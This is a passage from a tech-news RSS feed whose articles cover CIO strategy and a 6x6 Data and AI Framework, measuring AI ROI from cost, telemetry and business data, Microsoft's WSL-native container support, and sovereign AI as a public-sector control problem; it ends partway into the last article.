<p class="wp-block-paragraph">A full-stack CIO understands how every layer of the enterprise influences the next. They recognize that every strategic priority becomes a portfolio investment, every investment shapes an operating model, every operating model influences architecture, every architecture choice informs product decisions, every product decision shapes engineering priorities.</p>



<p class="wp-block-paragraph">The best CIOs understand both ends of that journey. The extraordinary ones understand everything in between.</p>



<p class="wp-block-paragraph">And those who execute best lead with clarity, Talasaz says.</p>



<p class="wp-block-paragraph">“Everyone, from executives to middle managers to the people writing code, should be able to explain what we’re trying to achieve,” he emphasizes. “Clarity isn’t that we’ve handed out the PowerPoint. It’s that people genuinely understand where we’re going and can articulate it in their own language.”</p>



<p class="wp-block-paragraph">One of the unintended consequences of the AI boom is that organizations are beginning to confuse activity with alignment. They have AI councils, AI governance committees, AI innovation labs, AI centers of excellence, AI pilots, and AI roadmaps. Yet if you stop ten people in the hallway and ask a deceptively simple question, What business problem are we actually trying to solve? you’ll often hear ten different answers.</p>



<p class="wp-block-paragraph">As a result, architects optimize for one objective while product teams optimize for another. Business units pursue opportunities that seem perfectly reasonable from their perspective. Engineers make thoughtful technical decisions based on the information available to them. Individually, none of those decisions are necessarily wrong. Collectively, however, they create organizational drift. AI doesn’t create that problem. It simply accelerates the consequences.</p>



<p class="wp-block-paragraph">And while AI can be a force multiplier for the positive when every decision is guided by a shared understanding of where the organization is headed, it can also be a force multiplier for the negative, resulting in an organization simply moving faster in different directions.</p>



<p class="wp-block-paragraph">“When we have the fundamentals right, the tech infrastructure, the operating models, the nuances of how our business actually runs, we get the impacts of AI in a positive way,” Talasaz says. “When we don’t have those in place, AI can amplify the gaps or mute the benefits.”</p>



<p class="wp-block-paragraph">At a time when so much of the conversation surrounding AI is focused on algorithms, agents, and automation, it’s an important reminder that organizations don’t execute strategy; people do.</p>



<h2 class="wp-block-heading">Reducing organizational friction</h2>



<p class="wp-block-paragraph">Most executives are familiar with the concept of VUCA that characterizes today’s business environment. But Talasaz stresses the importance of turning this concern inward: “If the world outside our organizations is becoming more volatile, uncertain, complex, and ambiguous, what are we, as leaders, doing to the inside of our organizations?”</p>



<p class="wp-block-paragraph">Leaders spend enormous amounts of time helping their organizations respond to external disruption but comparatively little time asking whether they are inadvertently re-creating those same conditions internally in response to those external needs. Are we reducing uncertainty or introducing more of it? Are we simplifying work or adding unnecessary complexity? Are we helping people focus on what matters most, or asking them to navigate competing priorities and shifting expectations?</p>



<p class="wp-block-paragraph">Talasaz refers to this phenomenon as double VUCA — something I’ve witnessed repeatedly while working with CIOs over the past decade. Organizations often assume they’re struggling because of technology limitations when the real constraint is organizational friction. Teams wait for decisions. Priorities shift faster than roadmaps. Governance grows heavier. New committees are formed to solve problems created by existing committees. Everyone is working harder, yet the organization somehow feels slower.</p>



<p class="wp-block-paragraph">AI amplifies both outcomes. Organizations with clarity become dramatically more effective because AI accelerates good decisions. Organizations without clarity simply accelerate confusion.</p>



<h1 class="wp-block-heading">Operating model as strategy enabler</h1>



<p class="wp-block-paragraph">AI governance is one way to achieve greater clarity, but as Talasaz says, governance shouldn’t primarily exist inside policy manuals that few people read.</p>



<p class="wp-block-paragraph">Instead, AI governance should be embedded in the daily rhythms of the organization, shaping how teams collaborate, how decisions are made, how products move from ideas into production, and how innovation happens safely without requiring constant escalation. In other words, it’s all about your operating model.</p>



<p class="wp-block-paragraph">“If you had to pick one thing that isn’t technology, your operating model is the most important element for executing data and AI at scale,” he says.</p>



<p class="wp-block-paragraph">The best operating models create enough clarity that capable people can make thousands of decisions independently and confidently, without having to wait for permission. By embedding good governance into the way it works, the organization becomes faster.</p>



<p class="wp-block-paragraph">This advice echoes something I’ve heard repeatedly from some of the world’s most respected CIOs: High-performing organizations aren’t built on tighter control; they’re built on greater trust, supported by clear principles, shared expectations, and operating models that enable responsible decision-making at every level of the enterprise.</p>



<p class="wp-block-paragraph">Talasaz points out that technology leaders tend to speak in terms of <em>transformation</em>. He suggests CIOs consider a different word: <em>reinvention.</em></p>



<p class="wp-block-paragraph">As he explains, transformation implies replacing what exists today with something new. Reinvention starts with a more clear-eyed and practical premise: Some things absolutely must change; others represent years, sometimes decades, of accumulated expertise, customer trust, operational discipline, and competitive advantage.</p>



<p class="wp-block-paragraph">Reinvention is about building on those strengths while also creating new ways to deliver value. The leaders making the greatest progress in their AI journeys seem to recognize that it’s less about abandoning the past than thoughtfully preparing the organization for the future.</p>



<h2 class="wp-block-heading">Closing the gap between strategy and execution</h2>



<p class="wp-block-paragraph">Full-stack CIOs must be able to map out the various layers of execution and planning that need to be done at every level of the organization to be successful. To help with this, Talasaz has developed a data and AI framework that draws on his own experiences “from the keyboard to the boardroom.”</p>



<p class="wp-block-paragraph">As Talasaz sees it, too many organizations have been doing good work in isolation. “They’re doing a lot of the right things,” he says. “They’re just not connected.”</p>



<p class="wp-block-paragraph">Boards may be discussing growth while business leaders redesign customer experiences. Product teams may be prioritizing new capabilities while architects modernize platforms. Data teams may be improving quality while engineers focus on delivery. Every group makes meaningful progress within its own domain, yet somewhere between strategy and execution, the connective tissue begins to disappear. Talasaz’s framework brings those connecting points to the forefront.</p>



<p class="wp-block-paragraph">Crucially, the framework doesn’t begin with technology or AI or even with data. It begins with the experiences the organization hopes to create for its customers, employees, or partners. Many AI initiatives start with the question, “What can this technology do?” And indeed, we need to be inspired by the possibilities and challenged to think differently by what the technology can do. But, Talasaz emphasizes, we also need to ask what experiences we need to deliver for our business and how the technology can make that a reality.</p>



<p class="wp-block-paragraph">The framework challenges CIOs to answer that question first. Only after the experiences are clearly defined does the conversation move to the capabilities required to deliver it, the business activities that support those capabilities, the AI and data products that enable them, and finally the data foundation that makes everything possible.</p>



<p class="wp-block-paragraph">This shift in perspective ensures that, rather than allowing technology investments to search for business value, the business experience defines the technology required to deliver it. For CIOs, that’s more than a planning exercise. It’s a fundamentally different way of leading.</p>



<p class="wp-block-paragraph"><em>Over the coming months, the P4P community will be convening a series of small CxO roundtables to explore these issues and work more deeply with Afshean Talasaz’s 6×6 Data and AI Framework. CIOs and other enterprise leaders interested in participating are welcome to <a href="mailto:droberts@ouellette-online.com?subject=P4P:%206x6%20Framework%20Roundtable">reach out to me directly</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Determining the ROI of AI requires data that most companies lack]]></title>
<description><![CDATA[Leadership wants to scale AI. Budgets are tripling. Adoption is up.



Then the CFO asks the question every board now asks: which of these initiatives is actually profitable?



Most organizations cannot answer that question, not because they lack visibility into cost, but because the cost data t...]]></description>
<link>https://tsecurity.de/de/3688477/ai-nachrichten/determining-the-roi-of-ai-requires-data-that-most-companies-lack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688477/ai-nachrichten/determining-the-roi-of-ai-requires-data-that-most-companies-lack/</guid>
<pubDate>Thu, 23 Jul 2026 11:07:22 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Leadership wants to scale AI. Budgets are tripling. Adoption is up.</p>



<p class="wp-block-paragraph">Then the CFO asks the question every board now asks: which of these initiatives is actually profitable?</p>



<p class="wp-block-paragraph">Most organizations cannot answer that question, not because they lack visibility into cost, but because the cost data they have was never designed to produce that answer.</p>



<p class="wp-block-paragraph">Applying lessons learned from <a href="https://www.infoworld.com/article/4147766/cloud-at-20-cost-complexity-and-control.html" data-type="link" data-id="https://www.infoworld.com/article/4147766/cloud-at-20-cost-complexity-and-control.html">managing cloud spend</a> won’t be a fix for the AI and ROI quandary. True, cloud taught a generation of CFOs that billing without business context is noise. So to get <a href="https://www.infoworld.com/article/4061122/cloud-computing-has-an-roi-problem.html" data-type="link" data-id="https://www.infoworld.com/article/4061122/cloud-computing-has-an-roi-problem.html">cloud ROI</a>, they stitched two data sources together: cost data plus business data. AWS reveals which account, which region, which tag, which resource. Merge in customer and product mappings on top and the ROI of the cloud spend comes into focus.</p>



<p class="wp-block-paragraph">But AI is harder. It requires three data sources: cost, business, and telemetry—the automatic collection of data from disparate sources that helps to clarify the whole picture of what happened and why. An executive or engineering lead can have AI invoices and customer revenue. But they have no way to connect them to business value. The token count on the OpenAI invoice does not specify which customer triggered which call, which feature it served, or whether the prompt produced a business outcome. That data does not exist in the provider’s billing.</p>



<h2 class="wp-block-heading">AI providers won’t fix this problem</h2>



<p class="wp-block-paragraph">The situation is not likely to change anytime soon because AI providers are not in the business of attributing an enterprise’s costs to that enterprise’s customers. Instead, AI providers are in the business of selling tokens. The granularity they expose is the granularity their billing systems require, not the granularity a CFO requires.</p>



<p class="wp-block-paragraph">Not convinced? Compare what AWS gives you to what an AI provider gives you.</p>



<p class="wp-block-paragraph">AWS billing exposes resource IDs, account hierarchies, region, SKU, tag metadata, usage by the minute. Every dollar can be attributed to a workload, a team, a customer segment if it was tagged correctly. The data is rich enough that mature FinOps teams built unit economics on top of it years ago.</p>



<p class="wp-block-paragraph">An AI provider invoice gives you tokens consumed by model, with optional grouping by API key. That is the resolution. No request-level attribution. No customer ID. No feature mapping. No prompt outcome. No retry identification. Multi-step agent workflows collapse into a token count. Imagine a large bank receives a multi-million dollar AI invoice each month. But it has no visibility into what parts of the business were responsible for what parts of the cost so cannot allocate them.</p>



<p class="wp-block-paragraph">If an enterprise wants to know what AI cost drove which customer or feature, it has to capture that data itself, inside an application, before the call leaves it. </p>



<h2 class="wp-block-heading">Three required sources</h2>



<p class="wp-block-paragraph">Building AI ROI measurement requires three data sources, stitched together in a single model.</p>



<ol class="wp-block-list">
<li><strong>Cost data, normalized across providers.</strong> Every AI provider delivers cost differently. OpenAI invoices in one taxonomy, Anthropic in another, fine-tuning vendors and inference platforms each in their own. Cloud GPU costs sit in AWS or Azure billing. Vector database costs land in Pinecone or Snowflake invoices. None interoperate by default. Normalization is necessary but not sufficient. It will put all your AI costs in one schema. It does not tell you what they produced.</li>



<li><strong>Application-layer telemetry. </strong>This is the source most organizations are missing, and the one that makes AI ROI structurally different from cloud ROI. It requires instrumenting AI calls inside your application across six categories: request-level tracing tied to a customer or session ID; feature attribution tied to the product surface that triggered the call; agent-step capture for multi-step workflows; retry and fallback identification so recovery costs don’t get attributed to primary calls; model selection logging that records which model was chosen and why; and outcome capture that ties each call to whether it produced business value. None of this data exists in the provider’s billing. All of it has to be captured at the moment the call is made and stored in a system that can be stitched to the cost data.</li>



<li><strong>Business data. </strong>Revenue, customer segments, product hierarchies, and feature usage. The same business data already feeding your CRM and analytics stack, mapped to the customers and features the telemetry layer attributes calls to.</li>
</ol>



<p class="wp-block-paragraph">Stitched together, the three sources produce the unit economics every AI investment decision now requires: cost per customer interaction, margin per feature, profitability per agent workflow, ROI per model choice. None of these can be calculated from billing data alone. None can be calculated from telemetry alone. They require all three sources, modeled together in a way that maps cost to outcome.</p>



<h2 class="wp-block-heading">Why agentic AI makes this urgent</h2>



<p class="wp-block-paragraph">Single-call inference is the easy case. One request, one cost, one customer, one outcome.</p>



<p class="wp-block-paragraph">Agentic workflows are different. An agent decomposes a task into multiple steps. Each step calls a model. Some steps fall back to a different model when the first fails. Some steps retry on a poor result. Some steps invoke external tools that themselves cost money. A single user request can produce dozens of inference calls across multiple providers, with the cost compounding in ways the provider invoice cannot disaggregate.</p>



<p class="wp-block-paragraph">If telemetry does not capture agent-step granularity, no one will know which steps are profitable. Aggregate costs will show up three weeks later in the invoice. By then, the workflow has been running at scale, customers are onboarded, and unprofitable paths have been retried thousands of times.</p>



<p class="wp-block-paragraph">When agents make the calls, the volume of cost-generating events without business context attached grows by an order of magnitude. The window for instrumenting this before it becomes unmanageable is closing.</p>



<h2 class="wp-block-heading">What changes when the three sources come together</h2>



<p class="wp-block-paragraph">Once the three sources are stitched together, the AI investment conversation changes.</p>



<p class="wp-block-paragraph">Five different ways to build the same AI capability stop looking equivalent. They converge on adoption metrics and diverge by 10x on cost. The team picks the approach that delivers a similar business outcome at one-fifth the cost, because the team can finally see the difference. Product teams design features with margin awareness from the architecture phase, not from the post-launch budget review. Engineering teams choose model architectures with cost-per-outcome data alongside latency and quality. Leadership evaluates AI initiatives the way they evaluate any other capital allocation: on unit economics, not on the engagement chart. Aggregated invoices track the cost per customer interaction. Engagement metrics reveal margin per feature. Gut-instinct model selection is checked against real cost-per-outcome model selection results. </p>



<p class="wp-block-paragraph">Within seconds, everyone can see which AI features are profitable, which should scale, and which should be killed. This is the insight everyone is looking for and companies that achieve it will optimize the benefits of AI.</p>



<h2 class="wp-block-heading">The build trap</h2>



<p class="wp-block-paragraph">AI costs are compounding now. The board is not waiting 18 months for an internal project to reach production.</p>



<p class="wp-block-paragraph">The temptation to build it anyway has never been sharper. AI coding tools have changed what a small engineering team can ship in a quarter. The instrumentation layer looks tractable. The cost normalization looks like a weekend project. The semantic model feels like something a senior engineer could draft over a sprint.</p>



<p class="wp-block-paragraph">It is a trap. Three reasons.</p>



<p class="wp-block-paragraph">Volume is the first. A production AI footprint generates millions of telemetry events per hour, and that volume scales with agentic adoption. Real-time ingestion, correlation, and attribution at that scale is not the same problem as <a href="https://www.infoworld.com/article/4078884/what-is-vibe-coding-ai-writes-the-code-so-developers-can-think-big.html" data-type="link" data-id="https://www.infoworld.com/article/4078884/what-is-vibe-coding-ai-writes-the-code-so-developers-can-think-big.html">vibe coding</a> a prototype in an afternoon. It is a permanent operational system that has to be right every minute of every day.</p>



<p class="wp-block-paragraph">The vendor landscape is the second. Cost data arrives in delayed billing windows from providers with non-interoperable schemas. Schemas change without notice. New AI providers enter the landscape monthly, each with its own taxonomy and metering. The system is not built once. It is maintained against a moving target that moves faster than most internal release cycles.</p>



<p class="wp-block-paragraph">The third is what the first two add up to: this is business-critical infrastructure. The CFO and the board are going to make capital allocation decisions on the data this system produces. When schema drift goes unnoticed for two weeks, when an agent telemetry stream stops correlating to a vendor that quietly changed its billing API, the cost of being wrong is not a sprint of cleanup. It is a quarter of misallocated capital.</p>



<p class="wp-block-paragraph">The build-vs.-buy question for engineering leaders has changed. It’s not “can we build this?” The honest answer is yes. The real question is whether the marginal hour of your strongest engineers is best spent stitching cost data to telemetry to business outcomes, or building the AI products that produce the revenue the cost data is measuring.</p>



<p class="wp-block-paragraph">The capability is reproducible in weeks. The choice is whether to spend the next 18 months building it, or the next 18 months acting on it.</p>



<p class="wp-block-paragraph"><em>—</em></p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[WSL container: A quiet revolution for Windows development]]></title>
<description><![CDATA[Running containers on Windows has never been as easy as it should be. While there are versions of Docker Desktop and Podman that work with both the Windows Subsystem for Linux (WSL) and Hyper-V, I’ve found both overly complex and unstable. Where they have worked, it’s turned out that Hyper-V has ...]]></description>
<link>https://tsecurity.de/de/3688476/ai-nachrichten/wsl-container-a-quiet-revolution-for-windows-development/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688476/ai-nachrichten/wsl-container-a-quiet-revolution-for-windows-development/</guid>
<pubDate>Thu, 23 Jul 2026 11:07:20 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Running containers on Windows has never been as easy as it should be. While there are versions of <a href="https://www.infoworld.com/article/2257241/why-you-should-use-docker-and-oci-containers.html" data-type="link" data-id="https://www.infoworld.com/article/2257241/why-you-should-use-docker-and-oci-containers.html">Docker Desktop</a> and <a href="https://www.infoworld.com/article/2335683/what-is-podman-and-will-it-replace-docker.html" data-type="link" data-id="https://www.infoworld.com/article/2335683/what-is-podman-and-will-it-replace-docker.html">Podman</a> that work with both the Windows Subsystem for Linux (WSL) and Hyper-V, I’ve found both overly complex and unstable. Where they have worked, it’s turned out that Hyper-V has been the best option, using a Linux virtual machine to host my containers. That all adds up to overhead, layers of virtual infrastructure that get in the way of work and that need to be rebuilt every time I restart my PC.</p>



<p class="wp-block-paragraph">Part of the problem is WSL. It’s a good tool, but WSL2’s file-system integration is slow, and you’re left having to work with code using Visual Studio Code’s remote integration, which means putting a <a href="https://code.visualstudio.com/docs/remote/vscode-server" data-type="link" data-id="https://code.visualstudio.com/docs/remote/vscode-server">VS Code Server</a> in every container you’re building and testing. If you’re working with <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html" data-type="link" data-id="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html">Kubernetes</a>, that’s even more complexity that needs to be managed, dragging you away from code.</p>



<p class="wp-block-paragraph">I ended up running most of my container testing and development from a separate machine, a Linux server running containerd. But though it worked (and had all the resources of workstation-class device), it wasn’t portable, and for some reason I’ve yet to uncover, Ubuntu’s remote desktop access doesn’t work for me.</p>



<p class="wp-block-paragraph">So, it was good to see Microsoft make several announcements around WSL at <a href="https://news.microsoft.com/build-2026/">Build 2026</a> as part of <a href="https://www.infoworld.com/article/4188967/making-windows-a-developer-platform-again.html">a push to make Windows a developer platform again</a>. The first, an improved WSL3, is still some way away, but the second, <a href="https://devblogs.microsoft.com/commandline/wsl-container-is-now-available-for-public-preview/">WSL-native container support</a>, shipped at the end of June. It is already seeing community-driven development of Docker Desktop-like tooling to help monitor and manage your containers.</p>



<p class="wp-block-paragraph">Delivering a WSL-based container platform fits in with the other developer-focused Windows announcements at Build. Making Windows behave more like Linux is Microsoft responding to developer needs, given that more than 50% of servers on Azure run a Linux distribution. Linux is the basis of cloud-native infrastructure, so developers need to be able to build on it wherever they are.</p>



<h2 class="wp-block-heading">Getting started with WSL container</h2>



<p class="wp-block-paragraph">WSL container provides a new CLI that works in parallel to the familiar WSL, with commands to support the entire container life cycle, from creation to shut down. All you need to do to get started is upgrade your WSL installation to the current pre-release build (at the time of writing this was 2.9.3). Simply open an administrator PowerShell terminal and enter <code>wsl --update --pre-release</code>.</p>



<p class="wp-block-paragraph">This downloads and installs the latest WSL release. Once you’ve closed and re-opened your terminal (to ensure that you’ve updated its context) you can check that WSLC has installed by entering <code>wslc</code>, which should <a href="https://learn.microsoft.com/en-us/windows/wsl/tutorials/wsl-containers" data-type="link" data-id="https://learn.microsoft.com/en-us/windows/wsl/tutorials/wsl-containers">list the available commands</a>. The new CLI is aliased to WSL container, if you prefer to keep your container work separate from WSL (and avoid typos that might accidentally affect your WSL installations).</p>



<p class="wp-block-paragraph">Under the hood Microsoft is using WSL container to trial new integration points for Linux in Windows. One key change is the use of a new file system that significantly speeds up access to Windows from inside a container. Another improvement gives WSL container a new networking mode that relays networking connections directly through the Windows network stack, ensuring it has access to the same resources and security as Windows.</p>



<h2 class="wp-block-heading">Calling Linux containers from Windows applications</h2>



<p class="wp-block-paragraph">Things get more interesting when you start to use the <a href="https://wsl.dev/api-reference/">WSL container API</a> from inside your Windows code. Here you can include calls to Linux containers inside your desktop applications, taking advantage of existing services, building and deploying containers from inside your CI/CD pipeline. Using the new file system and networking stack helps reduce the friction that comes with crossing the boundaries between the two platforms.</p>



<p class="wp-block-paragraph">The WSL container API is available as a NuGet package, with support for C, C#, and C++. It allows your code to start and stop containers, and interact directly with them, sending command-line calls and reading back responses. Where things get interesting is being able to launch a containerized service from your code, exposing its REST or gRPC APIs on a local network port. Microsoft has provided <a href="https://github.com/microsoft/WSL/tree/master/doc/samples">sample code</a> to show you what’s possible at this early stage.</p>



<p class="wp-block-paragraph">Microsoft is doing something revolutionary here. It’s taking the cloud-native, service-driven model and bringing it into Windows and using it to bridge decades of divergent development. You no longer have to rewrite a service that works on Linux to run in Windows; all you need to do is containerize the service and launch it from the WSL container API. When you’re done, the API will tidy up after you, shutting down the container and reclaiming the memory it used.</p>



<p class="wp-block-paragraph">It’s important to remember that this is only the first public preview of a rapidly developing platform. There are many opportunities here to, say, build on the syscall translation layer developed for WSL1 to produce a native Windows-to-Linux application integration stack that removes the overhead of using web-based service calls. It will be interesting to see what develops, but this first release is very interesting indeed.</p>



<h2 class="wp-block-heading">Manage Linux containers from Windows</h2>



<p class="wp-block-paragraph">If you want a Docker Desktop-like experience for building and testing containers on Windows developer hardware, you may not have long to wait. WSL container’s underlying API is already being used to build tools that manage and monitor containers for you. One such tool is the <a href="https://github.com/mhackermsft/wslcontainerdesktop" data-type="link" data-id="https://github.com/mhackermsft/wslcontainerdesktop">WSL Container Desktop</a>, under development on GitHub. While there aren’t any release builds yet, it’s easy enough to compile and get running by cloning the source repository and building using the .NET CLI. You do need to have the <a href="https://github.com/microsoft/windowsappsdk" data-type="link" data-id="https://github.com/microsoft/windowsappsdk">Windows App SDK</a> installed, and some features require access to the Azure CLI.</p>



<p class="wp-block-paragraph">WSL Container Desktop is built in C#, with a WinUI front end. It’s currently only verified for use on x64, though I was able to compile and run it on an Arm64 PC and use it to test and run containers. Once running, it gives you a well-designed front end for your WSL-hosted containers, showing what’s running and what resources they are using. You can link WSL Container Desktop to container registries, like Docker’s and Azure’s, so you can quickly pull base containers and then use the WSL container environment to add your own code and customizations.</p>



<p class="wp-block-paragraph">Your main interaction point is the WSL Container Desktop dashboard, which shows what containers are running and their current resource usage. Elements are displayed in cards, taking a cue from Windows’ own user interface and especially from its Settings app. From the dashboard, you can drill down into the available containers, with quick start, stop, and reload options, as well as an extended memory that includes the ability to open a web browser to the appropriate port. I tested this with a container that included an entire KDE webtop, giving me a Linux distro running in a container in my browser.</p>



<p class="wp-block-paragraph">Other options include a details view that displays current logs and provides tools for inspecting the state of a container. This is the type of tool that comes in useful when debugging and testing container applications, as it can provide insights that the WSL container CLI doesn’t offer. Another option helps you clean up after you’ve downloaded an image and don’t need it anymore, with analytics that show the largest images and images you haven’t used for some time. On top of its tooling for working with WSL containers, WSL Container Desktop provides a basic settings tool that helps you configure its look and feel, as well as how it integrates with Windows.</p>



<h2 class="wp-block-heading">Run Kubernetes inside Windows for cloud-native development</h2>



<p class="wp-block-paragraph">One of the more useful features of WSL Container Desktop is the ability to quickly stand up a <a href="https://k3s.io/" data-type="link" data-id="https://k3s.io/">K3s</a> Kubernetes instance in WSL that can be used to host WSL containers, providing a local environment to build and test cloud-native applications wherever you might be. The K3s tooling offers a similar experience to the Kubernetes project’s own <a href="https://www.infoworld.com/article/3964051/headlamp-a-multicluster-kubernetes-user-interface.html">Headlamp UI</a>, making it easy to go between your development environment and a production Kubernetes cluster.</p>



<p class="wp-block-paragraph">It’s fair to describe WSL container as one of those Windows features you didn’t think you needed, but now it’s here you can’t live without it. WSL container simplifies building a container development tool chain in Windows, and at the same time allows you to think about a new generation of hybrid applications that take advantage of decades of development in both Windows and Linux.</p>



<p class="wp-block-paragraph">The result is something that was unimaginable a few years ago: dropping a Linux container into the middle of a Windows application and treating it as another local service. As the WSL container platform evolves, you should expect to see more ways of bringing Linux and Windows together, using containers to deliver a hybrid platform that gives us the best of both worlds at long last.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sovereign AI has become the public-sector CIO’s control problem]]></title>
<description><![CDATA[In public-sector and regulated-cloud work, I learned that sovereignty rarely starts as a national strategy. It starts as an auditor’s question: Who can prove where the data went, which system made the decision and what changes when the vendor or infrastructure does? That question is now moving in...]]></description>
<link>https://tsecurity.de/de/3688461/it-nachrichten/sovereign-ai-has-become-the-public-sector-cios-control-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688461/it-nachrichten/sovereign-ai-has-become-the-public-sector-cios-control-problem/</guid>
<pubDate>Thu, 23 Jul 2026 11:05:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In public-sector and regulated-cloud work, I learned that sovereignty rarely starts as a national strategy. It starts as an auditor’s question: Who can prove where the data went, which system made the decision and what changes when the vendor or infrastructure does? That question is now moving into AI, and most sovereign-AI debates answer the wrong version of it.</p>



<p class="wp-block-paragraph">They ask whether a country can build its own model on domestic data and hardware. For the United States and China, which together hold more than 90% of global AI data-center capacity, per a <a href="https://institute.global/insights/tech-and-digitalisation/sovereignty-in-the-age-of-ai-strategic-choices-structural-dependencies">January 2026 Tony Blair Institute analysis</a>, that question is worth asking. However, for almost every other government, it is the wrong place to start. The operative question is narrower: Once AI is embedded in public services, who controls the stack?</p>



<h2 class="wp-block-heading">The 5 layers of public-sector control</h2>



<p class="wp-block-paragraph">For a CIO, sovereign AI means enforceable control across the AI lifecycle; model ownership is a separate question. Control has five layers:</p>



<ul class="wp-block-list">
<li><strong>Data control:</strong> Where sensitive public data sits, and whether it can train a vendor’s model.</li>



<li><strong>Model control:</strong> Which models clear which workloads, and under what validation.</li>



<li><strong>Infrastructure control:</strong> Whether critical workloads run in approved environments.</li>



<li><strong>Operational control:</strong> Whether AI-assisted actions are logged, monitored and reversible.</li>



<li><strong>Vendor control:</strong> Whether the agency keeps portability, audit rights and a real exit.</li>
</ul>



<p class="wp-block-paragraph">Those five layers are the control plane for public-service AI. Floyd Dcosta recently made the enterprise case in “<a href="https://www.cio.com/article/4147102/ai-without-sovereignty-is-just-outsourced-intelligence.html">AI without sovereignty is just outsourced intelligence</a>”: capability is what a tool can do; authority over how and when it does it is something a buyer can quietly lose. For public services, losing that authority plays out in the public eye.</p>



<p class="wp-block-paragraph">Public-sector AI risk differs from enterprise risk. A retailer’s bad recommendation costs a sale; a government’s AI touches benefits, tax enforcement, policing and emergency response, raising the bar to due process, records retention and continuity of operations. A government that cannot reconstruct an AI-assisted decision lacks operational sovereignty, even in a domestic data center.</p>



<h2 class="wp-block-heading">Evaluating risk: Concentration, jurisdiction and shadow AI</h2>



<p class="wp-block-paragraph">Foreign dependency is a real risk, but the exposure that matters is a sudden cutoff: A model you cannot audit, switch or exit, shut off by someone else’s order. A vendor’s nationality is a poor guide to that risk; control is.  Two markers matter. The first is concentration. In July 2024, a single faulty CrowdStrike update <a href="https://www.cisa.gov/news-events/alerts/2024/07/19/widespread-it-outage-due-crowdstrike-update">crashed about 8.5 million Windows machines</a>, disrupting airlines, hospitals, banks and governments worldwide. No attacker was involved; one homogeneous dependency failed everywhere at once. The lesson points away from vendor nationality and toward uniformity as the fault line, making portability and provider diversity resilience controls.</p>



<p class="wp-block-paragraph">The second is jurisdiction. In June 2025, Microsoft’s legal director for France <a href="https://www.sdxcentral.com/news/microsoft-tells-french-lawmakers-it-cant-protect-user-data-from-us-demands/">told a Senate inquiry, under oath</a>, that it could not guarantee that French public-sector data, even in French data centers, would be protected against US demands under the 2018 CLOUD Act. No such request had been made, and EU data has stayed in the EU since January 2025; senators called the assurance purely declarative. For the most sensitive data, residency does not equal control; the parent’s jurisdiction can matter as much as the server’s. Three US hyperscalers hold <a href="https://www.srgresearch.com/articles/european-cloud-providers-local-market-share-now-holds-steady-at-15">about 70% of the European cloud market</a>, while European providers’ share fell from 29% in 2017 to roughly 15%. Concentration plus jurisdiction is the exposure a CIO must price. I have watched teams treat vendor selection as the moment risk was solved; it rarely was.</p>



<p class="wp-block-paragraph">The wrong response is self-isolation. Most countries will never build frontier models, advanced chips, hyperscale clouds and talent pipelines at once; the Tony Blair Institute calls full self-sufficiency “too expensive, too slow and, for most countries, simply impossible.” The better test is workload sensitivity. Low-risk uses, such as drafting, translation and summarization, can run on commercial platforms with controls; high-risk uses, such as benefits eligibility, fraud investigation and healthcare triage, demand stricter control over data, model behavior and auditability.</p>



<p class="wp-block-paragraph">Mandating domestic-only provision before a competitive option exists inverts sovereignty. <a href="https://europe2031.ai/summary">Europe 2031</a>, a five-year scenario from June 2026 by European technologists and policy researchers, illustrates the failure mode: A 2027 “buy European” mandate lands as offensive cyber capability spreads, and agencies that switched to weaker providers are locked out and paying ransoms. The scenario is fiction; the mechanism is not. Leverage comes from being indispensable, not half-hearted self-sufficiency. The closer-to-home effect is shadow AI: Mandate an inferior sanctioned tool and staff bypass it, the way shadow IT grows up around tools people find too slow. A rule that pushes sensitive work into ungoverned shadow AI reduces control instead of adding it.</p>



<p class="wp-block-paragraph">Regulation and data-residency rules belong in any serious strategy, but carry failure modes. Blanket localization raises hosting costs and slows adoption without guaranteeing control, and a “sovereign cloud” on a foreign parent’s stack can amount to sovereignty theater. The more useful pattern tiers requirements by sensitivity. India’s BHASHINI shows the application layer done well: A public platform <a href="https://www.pib.gov.in/PressReleaseIframePage.aspx?PRID=2093333&amp;reg=3&amp;lang=2">serving 100 million-plus inferences a month across 22-plus languages</a> on a vendor- and cloud-agnostic design that keeps data and switching rights public. Sovereignty resides in the portability, not in a national model.</p>



<h2 class="wp-block-heading">Building an operational sovereignty strategy</h2>



